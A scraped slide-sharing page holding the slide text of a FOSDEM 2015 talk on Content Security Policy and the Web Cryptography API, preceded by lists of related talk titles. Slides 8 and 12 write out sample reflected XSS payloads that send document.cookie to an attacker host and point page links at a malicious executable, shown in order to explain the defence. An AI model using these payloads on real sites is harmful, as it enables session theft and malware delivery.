Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
21 05-2018
21 05-201821 05-2018
21 05-2018
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdf
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
 
Protecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environmentProtecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environment
 
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsA Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web Applications
 
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
 

Más de Samsung Open Source Group

The Complex IoT Equation (and FLOSS solutions)
The Complex IoT Equation (and FLOSS solutions)The Complex IoT Equation (and FLOSS solutions)
The Complex IoT Equation (and FLOSS solutions)Samsung Open Source Group
 
Rapid SPi Device Driver Development over USB
Rapid SPi Device Driver Development over USBRapid SPi Device Driver Development over USB
Rapid SPi Device Driver Development over USBSamsung Open Source Group
 
Tizen RT: A Lightweight RTOS Platform for Low-End IoT Devices
Tizen RT: A Lightweight RTOS Platform for Low-End IoT DevicesTizen RT: A Lightweight RTOS Platform for Low-End IoT Devices
Tizen RT: A Lightweight RTOS Platform for Low-End IoT DevicesSamsung Open Source Group
 
IoTivity: Smart Home to Automotive and Beyond
IoTivity: Smart Home to Automotive and BeyondIoTivity: Smart Home to Automotive and Beyond
IoTivity: Smart Home to Automotive and BeyondSamsung Open Source Group
 
IoTivity for Automotive: meta-ocf-automotive tutorial
IoTivity for Automotive: meta-ocf-automotive tutorialIoTivity for Automotive: meta-ocf-automotive tutorial
IoTivity for Automotive: meta-ocf-automotive tutorialSamsung Open Source Group
 
Open Source Metrics to Inform Corporate Strategy
Open Source Metrics to Inform Corporate StrategyOpen Source Metrics to Inform Corporate Strategy
Open Source Metrics to Inform Corporate StrategySamsung Open Source Group
 
IoTivity for Automotive IoT Interoperability
IoTivity for Automotive IoT InteroperabilityIoTivity for Automotive IoT Interoperability
IoTivity for Automotive IoT InteroperabilitySamsung Open Source Group
 
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...Samsung Open Source Group
 
Adding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux Device
Adding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux DeviceAdding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux Device
Adding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux DeviceSamsung Open Source Group
 
IoT: From Arduino Microcontrollers to Tizen Products using IoTivity
IoT: From Arduino Microcontrollers to Tizen Products using IoTivityIoT: From Arduino Microcontrollers to Tizen Products using IoTivity
IoT: From Arduino Microcontrollers to Tizen Products using IoTivitySamsung Open Source Group
 
Practical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under Linux
Practical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under LinuxPractical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under Linux
Practical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under LinuxSamsung Open Source Group
 
IoTivity Tutorial: Prototyping IoT Devices on GNU/Linux
IoTivity Tutorial: Prototyping IoT Devices on GNU/LinuxIoTivity Tutorial: Prototyping IoT Devices on GNU/Linux
IoTivity Tutorial: Prototyping IoT Devices on GNU/LinuxSamsung Open Source Group
 
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Things
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of ThingsJerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Things
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of ThingsSamsung Open Source Group
 

Más de Samsung Open Source Group (20)

The Complex IoT Equation (and FLOSS solutions)
The Complex IoT Equation (and FLOSS solutions)The Complex IoT Equation (and FLOSS solutions)
The Complex IoT Equation (and FLOSS solutions)
 
Easy IoT with JavaScript
Easy IoT with JavaScriptEasy IoT with JavaScript
Easy IoT with JavaScript
 
Spawny: A New Approach to Logins
Spawny: A New Approach to LoginsSpawny: A New Approach to Logins
Spawny: A New Approach to Logins
 
Rapid SPi Device Driver Development over USB
Rapid SPi Device Driver Development over USBRapid SPi Device Driver Development over USB
Rapid SPi Device Driver Development over USB
 
Tizen RT: A Lightweight RTOS Platform for Low-End IoT Devices
Tizen RT: A Lightweight RTOS Platform for Low-End IoT DevicesTizen RT: A Lightweight RTOS Platform for Low-End IoT Devices
Tizen RT: A Lightweight RTOS Platform for Low-End IoT Devices
 
IoTivity: Smart Home to Automotive and Beyond
IoTivity: Smart Home to Automotive and BeyondIoTivity: Smart Home to Automotive and Beyond
IoTivity: Smart Home to Automotive and Beyond
 
IoTivity for Automotive: meta-ocf-automotive tutorial
IoTivity for Automotive: meta-ocf-automotive tutorialIoTivity for Automotive: meta-ocf-automotive tutorial
IoTivity for Automotive: meta-ocf-automotive tutorial
 
GENIVI + OCF Cooperation
GENIVI + OCF CooperationGENIVI + OCF Cooperation
GENIVI + OCF Cooperation
 
Framework for IoT Interoperability
Framework for IoT InteroperabilityFramework for IoT Interoperability
Framework for IoT Interoperability
 
Open Source Metrics to Inform Corporate Strategy
Open Source Metrics to Inform Corporate StrategyOpen Source Metrics to Inform Corporate Strategy
Open Source Metrics to Inform Corporate Strategy
 
IoTivity for Automotive IoT Interoperability
IoTivity for Automotive IoT InteroperabilityIoTivity for Automotive IoT Interoperability
IoTivity for Automotive IoT Interoperability
 
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Thin...
 
Adding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux Device
Adding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux DeviceAdding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux Device
Adding IEEE 802.15.4 and 6LoWPAN to an Embedded Linux Device
 
IoTivity: From Devices to the Cloud
IoTivity: From Devices to the CloudIoTivity: From Devices to the Cloud
IoTivity: From Devices to the Cloud
 
SOSCON 2016 JerryScript
SOSCON 2016 JerryScriptSOSCON 2016 JerryScript
SOSCON 2016 JerryScript
 
IoT: From Arduino Microcontrollers to Tizen Products using IoTivity
IoT: From Arduino Microcontrollers to Tizen Products using IoTivityIoT: From Arduino Microcontrollers to Tizen Products using IoTivity
IoT: From Arduino Microcontrollers to Tizen Products using IoTivity
 
Run Your Own 6LoWPAN Based IoT Network
Run Your Own 6LoWPAN Based IoT NetworkRun Your Own 6LoWPAN Based IoT Network
Run Your Own 6LoWPAN Based IoT Network
 
Practical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under Linux
Practical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under LinuxPractical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under Linux
Practical Guide to Run an IEEE 802.15.4 Network with 6LoWPAN Under Linux
 
IoTivity Tutorial: Prototyping IoT Devices on GNU/Linux
IoTivity Tutorial: Prototyping IoT Devices on GNU/LinuxIoTivity Tutorial: Prototyping IoT Devices on GNU/Linux
IoTivity Tutorial: Prototyping IoT Devices on GNU/Linux
 
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Things
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of ThingsJerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Things
JerryScript: An ultra-lighteweight JavaScript Engine for the Internet of Things
 

Último

Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfDrew Moseley
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
Patterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencePatterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencessuser9e7c64
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Matt Ray
 
Understanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM ArchitectureUnderstanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM Architecturerahul_net
 
Ronisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited CatalogueRonisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited Catalogueitservices996
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesKrzysztofKkol1
 
2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shardsChristopher Curtin
 
Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf31events.com
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Rob Geurden
 
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingOpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingShane Coughlan
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...Akihiro Suda
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLionel Briand
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 

Último (20)

Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
Patterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencePatterns for automating API delivery. API conference
Patterns for automating API delivery. API conference
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
 
Understanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM ArchitectureUnderstanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM Architecture
 
Ronisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited CatalogueRonisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited Catalogue
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
 
2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards
 
Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...
 
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingOpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and Repair
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 

Web Security: CSP and Web Crypto

  • 1. Web Security CSP and Web Cryptography Habib Virji Samsung Open Source Group habib.virji@samsung.com FOSDEM 2015
  • 2. Agenda Why Web Security Cross site scripting Content security policy (CSP) CSP Directives and reporting Shortcomings Next Step Web Cryptography Introduction Web Crypto usage Next Step Conclusion
  • 4. Why Web Security Main threats as per OWASP1 are: Injection Broken authentication and session management Cross-site scripting Insecure direct object references Security misconfiguration. Sensitive data exposure Missing function level access control Cross site request forgery (CSRF). Components usage with known vulnerability. Unvalidated redirects and forwards. 1 OWASP: https://www.owasp.org/index.php/Top 10 2013-Top 10
  • 5. Cross site scripting (XSS) Same-origin policy Main reliance of security: scripts running should originate from the same site. protocol://host:port
  • 6. Cross site scripting (XSS) Same-origin policy Main reliance of security: scripts running should originate from the same site. protocol://host:port Same-origin policy is important for cookies which store sensitive information and user authentication details.
  • 7. Cross site scripting (XSS) Same-origin policy Main reliance of security: scripts running should originate from the same site. protocol://host:port Same-origin policy is important for cookies which store sensitive information and user authentication details. Cross-site scripting (XSS) Cross-site-scripting(XSS) breaks reliance on same origin security. XSS can inject client side scripts in web page. Reflected - Including inside query JavaScript code, which can process and pass back information. Persistent - This persists on the server and information is sent back to the server.
  • 8. XSS in action Reflected XSS: http://vulnerable-site.com/index.php?user= %3Cscript%3E window.onload = function() { var Links=document.getElementsByTagName(’a’); Links[0].href = ’http://attacker-site.com/malicious.exe’; } %3Cscript%3E %3Cscript%3E window.open(’http://www.attacker-site.com/collect?cookie=’+document.cookie); %3Cscript%3E new Image(’http://www.attacker-site.com/collect?cookie=’+document.cookie) (IBAN: 978-1597496049)
  • 9. Content-Security-Policy Solution to XSS with comprehensive solutions. HTTP response header set by origin/server to control/specify from where resources can be loaded. Origin site enforces static policies.
  • 10. Content-Security-Policy Solution to XSS with comprehensive solutions. HTTP response header set by origin/server to control/specify from where resources can be loaded. Origin site enforces static policies. Benefits from CSP: Separates code and data. Stop XSS and code injection via setting whitelist of allowable content and sources.
  • 11. Content-Security-Policy Solution to XSS with comprehensive solutions. HTTP response header set by origin/server to control/specify from where resources can be loaded. Origin site enforces static policies. Benefits from CSP: Separates code and data. Stop XSS and code injection via setting whitelist of allowable content and sources. Each page header has to set separate policy set.
  • 12. How CSP protects from XSS content-security-policy: connect-src ’self’ <script> window.open(http://www.attacker-site.com/collect? cookie=+document.cookie); </script> Error in console: Refused to connect to ’http://www.attacker-site.com/’ because it violates the document’s Content Security Policy directive: "connect-src ’self’".
  • 13. CSP Directives script-src: All eval and inline-script are stopped. style-src: All inline style are stopped. object-src: Source of flash source and other plugin object. image-src: Origins of images. font-src: font files. connect-src: Source for WebSocket/XHR/EventSource frame-src: Iframes source for embedding YouTube media-src: Source for Video and Audio default-src: All above. sandbox: Special directive to block everything. Access via allow-scripts, allow-forms
  • 14. CSP Reporting CSP Reporting provides a way of getting informed if some violation has been done. content-security-policy: default-src: ’self’; report-uri: /myreport Following report will be auto-generated and sent to the server when invalid access is done: {"csp-report": { "document-uri": "http://example.org/page.html", "referrer": "http://evil.example.com/", "blocked-uri": "http://evil.example.com/evil.js", "violated-directive": "default-src ’self’", "original-policy": "default-src ’self’, "report-uri" "http://example.org/myreport" } }
  • 15. CSP Reporting CSP Reporting provides a way of getting informed if some violation has been done. content-security-policy: default-src: ’self’; report-uri: /myreport Following report will be auto-generated and sent to the server when invalid access is done: {"csp-report": { "document-uri": "http://example.org/page.html", "referrer": "http://evil.example.com/", "blocked-uri": "http://evil.example.com/evil.js", "violated-directive": "default-src ’self’", "original-policy": "default-src ’self’, "report-uri" "http://example.org/myreport" } } Instead of moving full site to blocking other origins. content-security-policy-report-only: default-src: ’self’
  • 16. CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
  • 17. CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
  • 18. CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. Enforcement breaks important extensions present in the browser.3 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
  • 19. CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. Enforcement breaks important extensions present in the browser.3 Require changing structure of their site.3 Dynamically named sub-domains also stops websites using CSP features.4 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
  • 20. CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. Enforcement breaks important extensions present in the browser.3 Require changing structure of their site.3 Dynamically named sub-domains also stops websites using CSP features.4 Requires compliance across all web application from same origin.4 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
  • 21. CSP Next Step - Inline script What it addresses: content-security-policy: script-src ’self’
  • 22. CSP Next Step - Inline script What it addresses: content-security-policy: script-src ’self’ CSP made it mandatory not to include inline JavaScript but in all JavaScript in a separate file. Required using unsafe-inline, to allow inline JavaScript to execute. Several sites failed to adapt CSP such as Twitter.2
  • 23. CSP Next Step - Inline script What it addresses: content-security-policy: script-src ’self’ CSP made it mandatory not to include inline JavaScript but in all JavaScript in a separate file. Required using unsafe-inline, to allow inline JavaScript to execute. Several sites failed to adapt CSP such as Twitter.2 New mechanism handle inline JavaScript by setting nonce or hash values.
  • 24. CSP Next Step - Inline script Nonce mechanism: {content-security-policy: script-src: ’9253884’ } <script nonce="9253884"> doStuff(); </script> Challenges:5 New nonce is expected and no reuse of nonce. Support in the framework. 5 https://docs.google.com/presentation/d/12JxuNy92C6ARrlsGaykXW5PcD0PKmU1VBNtXyxaePZ4
  • 25. CSP Next Step - Inline script Nonce mechanism: {content-security-policy: script-src: ’9253884’ } <script nonce="9253884"> doStuff(); </script> Challenges:5 New nonce is expected and no reuse of nonce. Support in the framework. Hashing mechanism: {content-security-policy: script-src: ’sha256-67134...287d7a’ } <script> doStuff(); </script> Challenges:5 New hash for every change. Dynamic content handling. 5 https://docs.google.com/presentation/d/12JxuNy92C6ARrlsGaykXW5PcD0PKmU1VBNtXyxaePZ4
  • 26. CSP Next Step - SubResource Integrity Instead of securing whole page, secure resources. Fetched resource is reached without any manipulation when hosted at other origin.
  • 27. CSP Next Step - SubResource Integrity Instead of securing whole page, secure resources. Fetched resource is reached without any manipulation when hosted at other origin. <script src="https://legible.com/script.js" noncanonical-src="http://insecure.net/script.js" integrity="ni:///sha-256; asijfiqu4t12...woeji3W?ct=application/javascript"> </script>
  • 28. CSP Next Step - Per-page Suborigins Sites segregate contents into separate flexible synthetic origins. The synthetic origins should be related to the main origin. Content in synthetic origin can interact via postMessage. End user sees content coming from a single origin content-security-policy: suborigin ’<name>’ protocol://name@host:port
  • 30. Introduction JavaScript API’s to perform cryptographic operations such as Hashing Signature generation and verification. Encryption and decryption Derive keys and bits
  • 31. Introduction JavaScript API’s to perform cryptographic operations such as Hashing Signature generation and verification. Encryption and decryption Derive keys and bits Uses 4 interfaces: RandomSource, CryptoKey, SubtleCrypto and WorkerCrypto.
  • 32. Introduction JavaScript API’s to perform cryptographic operations such as Hashing Signature generation and verification. Encryption and decryption Derive keys and bits Uses 4 interfaces: RandomSource, CryptoKey, SubtleCrypto and WorkerCrypto. Different key format supported are: {”raw”, ”spki”, ”pkcs8”, ”jwk”}
  • 33. Web Cryptography Algorithms Digest SHA-1/256/384/512 GenerateKey RSASSA-PKCS1-v1 5, RSA-PSS/OAEP, AES-CTR/CBC/CMAC/GCM/CFB/KW, ECDSA, HMAC, DH, PBKDF2 Import/Export RSASSA-PKCS1-v1 5, RSA-PSS/OAEP, AES-CTR/CBC/CMAC/GCM/CFB/KW, HMAC, DH, PBKDF2, CONCAT HKDF-CTR, ECDSA, ECDH Sign/Verify RSASSA-PKCS1-v1 5, RSA-PSS, ECDSA, AES-CMAC, HMAC Encrypt/Decrypt RSA-OAEP, AES-CTR/CBC/GCM/CFB DeriveBits/Key ECDH, DH, CONCAT, HKDF-CTR, PBKDF2 Wrap/Unwrap RSA-OAEP, AES-CTR/CBC/GCM/CFB/KW
  • 34. Use Case6 Multi-factor authentication for user or service. Protected document exchange Cloud storage Document or code signing Confidentiality and integrity of communication. JavaScript object signing and encryption (JOSE). 6 http://www.w3.org/TR/WebCryptoAPI/
  • 35. Digest - SHA-256 var userInput = "Integrity example"; var typedArray = new Uint8Array(userInput.length); for (var i=0; i<userInput.length; i++) typedArray[i]=userInput.charCodeAt(i); var promise = crypto.subtle.digest( {name:"SHA-256"}, typedArray); promise.then(function(dgst){ console.log(bytesToHexString(dgst)); });
  • 36. Digest - SHA-256 var userInput = "Integrity example"; var typedArray = new Uint8Array(userInput.length); for (var i=0; i<userInput.length; i++) typedArray[i]=userInput.charCodeAt(i); var promise = crypto.subtle.digest( {name:"SHA-256"}, typedArray); promise.then(function(dgst){ console.log(bytesToHexString(dgst)); }); function bytesToHexString(bytes) { bytes = new Uint8Array(bytes); var hexBytes = []; for (var i = 0; i < bytes.length; ++i) { var byteString=bytes[i].toString(16); if (byteString.length < 2) byteString = "0" + byteString; hexBytes.push(byteString); } return hexBytes.join(""); }
